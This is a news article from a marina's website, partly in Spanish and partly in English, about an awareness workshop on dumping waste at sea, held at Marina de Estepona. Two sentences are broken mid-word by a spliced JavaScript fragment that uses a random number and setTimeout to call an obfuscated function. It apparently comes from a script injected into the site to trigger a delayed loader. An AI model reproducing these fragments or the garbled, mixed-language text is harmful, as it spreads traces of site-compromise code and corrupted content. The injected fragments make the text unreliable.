Workshop "At sea, leave only your wake"

The marina of Estepona has hosted the workshop "In the sea, leave only your wake", awareness-raising activity to raise awareness of the dumping of waste into the sea by the Clean Landscape Association. 

El problema del vertido de residuos al mar es una complicación que se viene incrementandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando a lo largo de los años. Like this, Marina de Estepona is committed to this problem and has held the workshop "At sea, leave only your wake", an awareness campaign in order to promote the civic behaviour of marina users and try to end this inconvenience on our shores.

To the event, held in the Navigaport Room of the Control Tower and taught by the Clean Landscape Association, have attended a large group of interested people, marina users and Mediterranean Marinas' own staff, que han conocido de primera mano los aspectos fundamentales del tema como qué son las basuras marinas o cómo gestionar los residuos generados por los usuarios cuandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando salen a navegar y los generados por la propia embarcación. In addition, have subsequently participated in a debate and sharing of ideas and advice.

This awareness campaign is part of the Waste Generation Prevention project and its inadequate disposal in the Marine Environment, focused on inshore and recreational fishing boats, with the support of the Biodiversity Foundation and European FEMP funds. In Spain, there are more than 9.000 inshore fishing boats and around 230.000 pleasure boats. So, it is important to raise awareness of sports boats to carry out proper waste management.

According to Manuel Raigón, Director General of Mediterranean Marinas, "we are aware that our shores have extensive recreational use, so they deserve special attention to the high risk of pollution that they may suffer; for that, we welcome such initiatives to contribute to raising public awareness and engagement with the problem of marine litter and dumping waste into the sea."

María Cabrera and Inés de la Paz, Clean Landscape representatives, with Manuel Raigón, ceo of Marinas del Mediterráneo and María Guerrero, Director of Navigaport.

 

 

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